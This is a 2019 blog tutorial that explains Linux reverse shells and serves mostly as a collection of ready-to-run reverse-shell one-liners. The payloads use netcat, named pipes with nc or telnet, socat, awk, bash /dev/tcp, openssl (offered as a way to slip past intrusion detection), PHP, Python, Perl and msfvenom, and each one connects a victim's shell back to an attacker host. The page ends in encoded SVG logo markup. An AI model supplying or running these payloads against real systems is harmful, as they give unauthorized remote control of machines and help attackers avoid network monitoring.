24 Aug 2019
Hello and welcome again! In this post I'd love to share to you my small knowledge on reverse shells specifically on linux target. I'm not here to talking about exploitation techniques or shellcoding. If you intersted to know, I'll make other post specifically on the particular topics.
This post I made my best to be easy to understand for beginners. These also requires you to understand networking client/server model. These process are just like a very basic client server model where there is a listener (server) where it listen on incoming connections and the client where it perform a connection to the server.
What is reverse shell?
Reverse shell or often called connect-back shell is remote shell introduced from the target by connecting back to the attacker machine and spawning target shell on the attacker machine. This usually used during exploitation process to gain control of the remote machine.
When to use reverse shell?
Reverse shell usually used when the target machine is blocking incoming connection from certain port by active firewall. To bypass this firewall restriction, people use reverse shell so that let the remote target connect back to us and spawning their shell instead of we connect to them and they spawn their shell to us (bind shell).
Caveats:
This exposes the control server of the attacker and traces might pickup by network security monitoring services of target network.
Some mitigation might helps bypassing those neglect and/or makes certain programs/investigation harder to traces back to control server. Interested? read more here.
In this post, I'll be sharing a simple way for understanding purposes and showing you more my reverse shell code collection.
Getting reverse shell
Usually when attacker successfully exploiting target with code execution, we usually want to take the channel and operate post exploitation under a shell terminal as it much easier.
There are three steps in order to get a reverse shell.
- Exploiting a vulnerability on target system/network with the ability to perform a code execution.
- Setting up a listener.
- Injecting reverse shell code on vulnerable system to exploit the vulnerabilty.
There are plenty ways/payload to get a reverse shell, the simplest that I like to use is by using netcat command but first, read through the pages carefully.
1. Exploiting a vulnerability
This step I won't tell you much in this post but the idea is to find a vulnerability that can be leverage to perform a code execution. Once you find the code execution vulnerability, then is only you can leverage the exploit and gain a shell in this case a reverse shell.
In my list of reverse shell payloads below, there are many difference use cases for each payloads, the reasons are because of different platform understand its own "language", runs on its own "platform" and "architecture" etcetra.
For example, a vulnerable PHP application that runs on Linux server are only going to work with PHP payloads not python or jsp.
The payloads are also runs on a context of the application vulnerability. For example, PHP application that runs on a linux server has a command injection vulnerability. Depending on the server behavior, a linux command injection reverse shell payload might be doable in most cases.
2. Setting up a listener
First, always set up your listener!
First you need to set up listener on your attacking machine to be able the victim connect back to you and spawning their shell.
Note: About choosing a listener port, well yes it can be anything as long as the port is not blocked by their outgoing firewall. Some server block all outgoing port except 80 or 443 so that the server can make a web request. Thus, you need to set a listener on allowed outgoing port. Further investigation required to avoid any suspicious activity on target network.
In this example, the victim allow outgoing port on any port (default iptables firewall rule). So we use 4444 as a listener port. Change it to your preferable port you like. Listener could be any program/utility that can open TCP/UDP connections or sockets. In our case I would like to use nc or netcat utility.
$ nc -lvp 4444
This command tells netcat to -l listen with -v verbose output on -p port 4444 on every interface. Through out this post, I'll make a placeholder <LHOST> which refers to your attacking machine IP and <LPORT> refers to your listener port. Replace it with yours respectively.
3. Connect back system shell to your listener
And on the target server where the code execution lies, you need to run a connect back system command to your attacking machine. As example, I use netcat command and execute /bin/sh.
Note: This is a simple example where the target is a linux machine and gets system code execution. And also has the command nc with -e support (usually have on older system).
This can be done using the following commands:
$ nc -e /bin/sh 192.168.1.10 4444
Where 192.168.1.10 is your attacking IP and 4444 is your listening port. After a few seconds, you should get victim shell on your terminal where you listen.
nc -lvp 4444
Listening on [0.0.0.0] (family 2, port 4444)
Connection from victimip 39540 received!
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
To testing on your own without the vulnerable application, you can just run the command on your linux box with the LHOST would be 127.0.0.1 and another terminal would be your listener.
Other reverse shell payloads
1. Using socat to get a reverse shell.
Socat is also a popular utility/program other than netcat but usually not installed by default on most linux servers. If the target server has socat installed, you can use the following commands and get a tty shell directly without needing to upgrade it.
Listener:
socat -,raw,echo=0 tcp-listen:<LPORT>
victim:
socat tcp:<LHOST>:<LPORT> exec:"bash -i",pty,stderr,setsid,sigint,sane
2. Creates a semi-interactive shell via GNU AWK.
This spawn /bin/sh and creates two way communication stdin and stdout and close socket on CTRL+C or exit. This does not support stderr. If stderr, it will seen on victim.
awk 'BEGIN{s="/inet/tcp/0/<LHOST>/<LPORT>";while(1){if((s|&getline c)<0||c=="exit")break;while(c&&(c|&getline)>0)print$0|&s;close(c)}}'
3. Creates a semi-interactive shell via bash's builtin /dev/tcp.
This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
bash -c '0<&60-;exec 60<>/dev/tcp/<LHOST>/<LPORT>;sh <&60 >&60 2>&60' 2> /dev/null
Another bash reverse shell.
bash -c 'sh -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
4. Creates a semi-interactive shell via netcat
Newer linux machine by default has traditional netcat with GAPING_SECURITY_HOLE disabled. When the GAPING_SECURITY_HOLE is disabled, it means you don't have the '-e' option of netcat, which will execute specified command after a connection has been established.
Well this just isn't necessary. The following tricks creates a FIFO named pipes file system object and use it as a backpipe stdin for the netcat command while the pipes relay stdout and stderr from /bin/sh command. This is beautiful! Then the rm command will remove the named pipe automatically when the connection is terminated.
mkfifo /tmp/p; nc <LHOST> <LPORT> 0</tmp/p | /bin/sh > /tmp/p 2>&1; rm /tmp/p
Below payloads are also same but with using mknod to make the FIFO named pipe. Both telnet and netcat works well in this case.
mknod /tmp/b p && nc <LHOST> <LPORT> 0</tmp/b | /bin/sh > /tmp/b 2>&1;rm /tmp/b
mknod /tmp/j p && telnet <LHOST> <LPORT> 0</tmp/j | /bin/sh > /tmp/j 2>&1;rm /tmp/j
Old netcat with -e enabled allows direct command execution after establishing sockets. The command must be specified as a full pathname.
nc -e /bin/sh <LHOST> <LPORT>
5. Creates a semi-interactive shell via openssl
Encrypted reverse shell connection might help manual/automatic detection by a network security monitoring tools on the target network harder and sometimes could even bypass the IDS.
In order to use SSL in your reverse shell, first you need to generate a SSL certificate for the tunnel.
Generate SSL certificate:
openssl req -x509 -quiet -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Start SSL listener using openssl utility.
openssl s_server -quiet -key key.pem -cert cert.pem -port <LPORT>
Run the payload on victim using openssl client.
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <LHOST>:<LPORT> > /tmp/s 2> /dev/null; rm /tmp/s
6. PHP reverse shell
Simple PHP reverse shell that use exec() function to execute system command. If exec() function is disabled. You can try other PHP function that can execute system command such as system().
php -r '$sock=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
7. Python Reverse shell
Creates a semi-interactive shell using python.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
8. Perl Rev shell
Creates a semi-interactive shell using perl.
perl -e 'use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Build in Kali Linux web shells
Kali Linux has common webshells you can use without finding online in /usr/share/webshells. Select appropriate webshell based on your target platform, modify the LHOST and LPORT and upload it on the target system.
$ ls /usr/share/webshells
Advance: Generate custom reverse shell using msfvenom from Metasploit
Most of the reverse shell you see here you can also get it within Metasploit msfvenom 😛. Thus eliminate the needed to searching reverse shell payload online.
List available payloads
msfvenom -l payloads | grep "cmd/unix/reverse"
Any of these payloads can be used with msfvenom to spit out the raw command needed (specifying LHOST, LPORT or RPORT). For example, here's a netcat command not requiring the -e flag:
Generate shell via msfvenom
$ msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.1.112 LPORT=4545 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 103 bytes
mkfifo /tmp/zcjvnno; nc 192.168.1.112 4545 0</tmp/zcjvnno | /bin/sh >/tmp/zcjvnno 2>&1; rm /tmp/zcjvnno
And here's an example Perl oneliner in case netcat isn't installed:
$ msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.112 LPORT=4545 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 232 bytes
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.112:4545");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
Next level!
Congratulation on having a reverse shell on your target. Next step that I would recommend is to spawning a real tty shell to complete control over your shell session.
How do you think my post here? Let me know down in the comment section below and If you have any question, or something unclear don't hesitate to ping me in the comment. Good luck and stay ethical.
'%3E%3Cg id='Group'%3E%3Cg id='Combined Shape'%3E%3Cuse xlink:href='%23path0_fill' transform='translate(5201.49 697.468)' fill='%23FFFFFF'/%3E%3C/g%3E%3Cg id='Logo'%3E%3Cg id='Fill 1'%3E%3Cuse xlink:href='%23path1_fill' transform='translate(5188.19 700.863)' fill='%23FF9100'/%3E%3C/g%3E%3Cg id='Fill 2'%3E%3Cuse xlink:href='%23path2_fill' transform='translate(5188.19 700.863)' fill='%23FFDD00'/%3E%3C/g%3E%3Cg id='Fill 3'%3E%3Cuse xlink:href='%23path3_fill' transform='translate(5186.75 699.413)' fill='%23FFFFFF'/%3E%3C/g%3E%3Cg id='Stroke 4'%3E%3Cuse xlink:href='%23path4_stroke' transform='translate(5186.75 699.413)'/%3E%3C/g%3E%3Cg id='Fill 6'%3E%3Cuse xlink:href='%23path5_fill' transform='translate(5188.24 697.056)' fill='%23FFFFFF'/%3E%3C/g%3E%3Cg id='Group 11'%3E%3Cg id='Stroke 7'%3E%3Cuse xlink:href='%23path6_stroke' transform='translate(5188.24 697.056)' fill='%23050505'/%3E%3C/g%3E%3Cg id='Stroke 9'%3E%3Cuse xlink:href='%23path7_stroke' transform='translate(5187.29 700.863)'/%3E%3C/g%3E%3C/g%3E%3Cg id='Fill 12'%3E%3Cuse xlink:href='%23path8_fill' transform='translate(5187.07 705.304)' fill='%23FFFFFF'/%3E%3C/g%3E%3Cg id='Stroke 13'%3E%3Cuse xlink:href='%23path9_stroke' transform='translate(5187.07 705.304)'/%3E%3C/g%3E%3C/g%3E%3Cg id='Oval' opacity='0.2'%3E%3Cmask id='mask0_outline_ins'%3E%3Cuse xlink:href='%23path10_fill' fill='white' transform='translate(5180.65 701.166)'/%3E%3C/mask%3E%3Cg mask='url(%23mask0_outline_ins)'%3E%3Cuse xlink:href='%23path11_stroke_2x' transform='translate(5180.65 701.166)' fill='%23FFFFFF'/%3E%3C/g%3E%3C/g%3E%3Cg id='Oval' opacity='0.2'%3E%3Cuse xlink:href='%23path12_fill' transform='translate(5200.84 707.692)' fill='%23FFFFFF'/%3E%3C/g%3E%3Cg id='Oval'%3E%3Cuse xlink:href='%23path12_fill' transform='translate(5184.56 712.696)' fill='%23FFFFFF'/%3E%3C/g%3E%3C/g%3E%3C/g%3E%3Cdefs%3E%3Cpath id='path0_fill' fill-rule='evenodd' d='M 1.11914 0.172241C 1.02246 0.272827 0.962891 0.409363 0.962891 0.559753L 0.962891 0.962952L 0.55957 0.962952C 0.250488 0.962952 0 1.21356 0 1.52277C 0 1.83191 0.250488 2.08252 0.55957 2.08252L 0.962891 2.08252L 0.962891 2.48566C 0.962891 2.7948 1.21338 3.04547 1.52246 3.04547C 1.83203 3.04547 2.08252 2.7948 2.08252 2.48566L 2.08252 2.08252L 2.48584 2.08252C 2.79492 2.08252 3.04541 1.83191 3.04541 1.52277C 3.04541 1.21356 2.79492 0.962952 2.48584 0.962952L 2.08252 0.962952L 2.08252 0.559753C 2.08252 0.25061 1.83203 0 1.52246 0C 1.36377 0 1.2207 0.06604 1.11914 0.172241Z'/%3E%3Cpath id='path1_fill' fill-rule='evenodd' d='M 5.02978 0.0305451L 0 0L 2.46998 15.7258L 3.00889 15.7258L 7.94885 15.7258L 8.48776 15.7258L 10.9577 0L 5.02978 0.0305451Z'/%3E%3Cpath id='path2_fill' fill-rule='evenodd' d='M 5.02978 0.0305451L 0 0L 2.46998 15.7258L 3.00889 15.7258L 6.69141 15.7258L 7.23031 15.7258L 9.7003 0L 5.02978 0.0305451Z'/%3E%3Cpath id='path3_fill' fill-rule='evenodd' d='M 0 1.45021L 12.9786 1.45021L 12.9786 0L 0 0L 0 1.45021Z'/%3E%3Cpath id='path4_stroke' d='M 0 1.45021L -0.440282 1.45021L -0.440282 1.8905L 0 1.8905L 0 1.45021ZM 12.9786 1.45021L 12.9786 1.8905L 13.4189 1.8905L 13.4189 1.45021L 12.9786 1.45021ZM 12.9786 0L 13.4189 0L 13.4189 -0.440282L 12.9786 -0.440282L 12.9786 0ZM 0 0L 0 -0.440282L -0.440282 -0.440282L -0.440282 0L 0 0ZM 0 1.8905L 12.9786 1.8905L 12.9786 1.00993L 0 1.00993L 0 1.8905ZM 13.4189 1.45021L 13.4189 0L 12.5384 0L 12.5384 1.45021L 13.4189 1.45021ZM 12.9786 -0.440282L 0 -0.440282L 0 0.440282L 12.9786 0.440282L 12.9786 -0.440282ZM -0.440282 0L -0.440282 1.45021L 0.440282 1.45021L 0.440282 0L -0.440282 0Z'/%3E%3Cpath id='path5_fill' fill-rule='evenodd' d='M 8.98176 0L 5.88305 0L 4.04179 0L 0.943084 0L 0 2.17532L 4.04179 2.17532L 5.88305 2.17532L 9.92484 2.17532L 8.98176 0Z'/%3E%3Cpath id='path6_stroke' d='M 8.98176 0L 9.38571 -0.175129L 9.27076 -0.440282L 8.98176 -0.440282L 8.98176 0ZM 0.943084 0L 0.943084 -0.440282L 0.654085 -0.440282L 0.539131 -0.175129L 0.943084 0ZM 0 2.17532L -0.403953 2.00019L -0.670758 2.6156L 0 2.6156L 0 2.17532ZM 9.92484 2.17532L 9.92484 2.6156L 10.5956 2.6156L 10.3288 2.00019L 9.92484 2.17532ZM 8.98176 -0.440282L 5.88305 -0.440282L 5.88305 0.440282L 8.98176 0.440282L 8.98176 -0.440282ZM 5.88305 -0.440282L 4.04179 -0.440282L 4.04179 0.440282L 5.88305 0.440282L 5.88305 -0.440282ZM 4.04179 -0.440282L 0.943084 -0.440282L 0.943084 0.440282L 4.04179 0.440282L 4.04179 -0.440282ZM 0.539131 -0.175129L -0.403953 2.00019L 0.403953 2.35045L 1.34704 0.175129L 0.539131 -0.175129ZM 0 2.6156L 4.04179 2.6156L 4.04179 1.73504L 0 1.73504L 0 2.6156ZM 4.04179 2.6156L 5.88305 2.6156L 5.88305 1.73504L 4.04179 1.73504L 4.04179 2.6156ZM 5.88305 2.6156L 9.92484 2.6156L 9.92484 1.73504L 5.88305 1.73504L 5.88305 2.6156ZM 10.3288 2.00019L 9.38571 -0.175129L 8.5778 0.175129L 9.52089 2.35045L 10.3288 2.00019Z'/%3E%3Cpath id='path7_stroke' d='M 5.92796 0.0305451L 5.92569 0.470845L 5.93023 0.470821L 5.92796 0.0305451ZM 0 0L 0.00226862 -0.440276L -0.515251 -0.442943L -0.43495 0.0683159L 0 0ZM 2.46998 15.7258L 2.03503 15.7941L 2.09346 16.166L 2.46998 16.166L 2.46998 15.7258ZM 9.38594 15.7258L 9.38594 16.166L 9.76246 16.166L 9.82089 15.7941L 9.38594 15.7258ZM 11.8559 0L 12.2909 0.0683159L 12.3712 -0.442943L 11.8537 -0.440276L 11.8559 0ZM 5.93023 -0.409731L 0.00226862 -0.440276L -0.00226862 0.440276L 5.92569 0.470821L 5.93023 -0.409731ZM -0.43495 0.0683159L 2.03503 15.7941L 2.90493 15.6574L 0.43495 -0.0683159L -0.43495 0.0683159ZM 2.46998 16.166L 3.00889 16.166L 3.00889 15.2855L 2.46998 15.2855L 2.46998 16.166ZM 3.00889 16.166L 8.84703 16.166L 8.84703 15.2855L 3.00889 15.2855L 3.00889 16.166ZM 8.84703 16.166L 9.38594 16.166L 9.38594 15.2855L 8.84703 15.2855L 8.84703 16.166ZM 9.82089 15.7941L 12.2909 0.0683159L 11.421 -0.0683159L 8.95099 15.6574L 9.82089 15.7941ZM 11.8537 -0.440276L 5.92569 -0.409731L 5.93023 0.470821L 11.8582 0.440276L 11.8537 -0.440276Z'/%3E%3Cpath id='path8_fill' fill-rule='evenodd' d='M 12.2601 0L 6.34287 0L 5.91723 0L 0 0L 1.10682 6.25405L 6.13005 6.19953L 11.1533 6.25405L 12.2601 0Z'/%3E%3Cpath id='path9_stroke' d='M 12.2601 0L 12.6936 0.0767275L 12.7851 -0.440282L 12.2601 -0.440282L 12.2601 0ZM 0 0L 0 -0.440282L -0.525044 -0.440282L -0.433545 0.0767275L 0 0ZM 1.10682 6.25405L 0.673277 6.33077L 0.73833 6.69835L 1.1116 6.6943L 1.10682 6.25405ZM 6.13005 6.19953L 6.13483 5.75917L 6.12527 5.75927L 6.13005 6.19953ZM 11.1533 6.25405L 11.1485 6.6943L 11.5218 6.69835L 11.5868 6.33077L 11.1533 6.25405ZM 12.2601 -0.440282L 6.34287 -0.440282L 6.34287 0.440282L 12.2601 0.440282L 12.2601 -0.440282ZM 6.34287 -0.440282L 5.91723 -0.440282L 5.91723 0.440282L 6.34287 0.440282L 6.34287 -0.440282ZM 5.91723 -0.440282L 0 -0.440282L 0 0.440282L 5.91723 0.440282L 5.91723 -0.440282ZM -0.433545 0.0767275L 0.673277 6.33077L 1.54037 6.17732L 0.433545 -0.0767275L -0.433545 0.0767275ZM 1.1116 6.6943L 6.13483 6.63978L 6.12527 5.75927L 1.10204 5.81379L 1.1116 6.6943ZM 6.12527 6.63978L 11.1485 6.6943L 11.1581 5.81379L 6.13483 5.75927L 6.12527 6.63978ZM 11.5868 6.33077L 12.6936 0.0767275L 11.8266 -0.0767275L 10.7197 6.17732L 11.5868 6.33077Z'/%3E%3Cpath id='path10_fill' fill-rule='evenodd' d='M 1.845 3.69804C 2.86397 3.69804 3.69001 2.87021 3.69001 1.84902C 3.69001 0.827835 2.86397 0 1.845 0C 0.826036 0 0 0.827835 0 1.84902C 0 2.87021 0.826036 3.69804 1.845 3.69804Z'/%3E%3Cpath id='path11_stroke_2x' d='M 1.845 5.11673C 3.6504 5.11673 5.10869 3.65082 5.10869 1.84902L 2.27132 1.84902C 2.27132 2.0896 2.07754 2.27936 1.845 2.27936L 1.845 5.11673ZM 5.10869 1.84902C 5.10869 0.0472286 3.6504 -1.41869 1.845 -1.41869L 1.845 1.41869C 2.07754 1.41869 2.27132 1.60844 2.27132 1.84902L 5.10869 1.84902ZM 1.845 -1.41869C 0.0396073 -1.41869 -1.41869 0.0472286 -1.41869 1.84902L 1.41869 1.84902C 1.41869 1.60844 1.61246 1.41869 1.845 1.41869L 1.845 -1.41869ZM -1.41869 1.84902C -1.41869 3.65082 0.0396073 5.11673 1.845 5.11673L 1.845 2.27936C 1.61246 2.27936 1.41869 2.0896 1.41869 1.84902L -1.41869 1.84902Z'/%3E%3Cpath id='path12_fill' fill-rule='evenodd' d='M 0.868237 1.74026C 1.34775 1.74026 1.73647 1.35069 1.73647 0.870128C 1.73647 0.38957 1.34775 0 0.868237 0C 0.388723 0 0 0.38957 0 0.870128C 0 1.35069 0.388723 1.74026 0.868237 1.74026Z'/%3E%3C/defs%3E%3C/svg%3E%0A)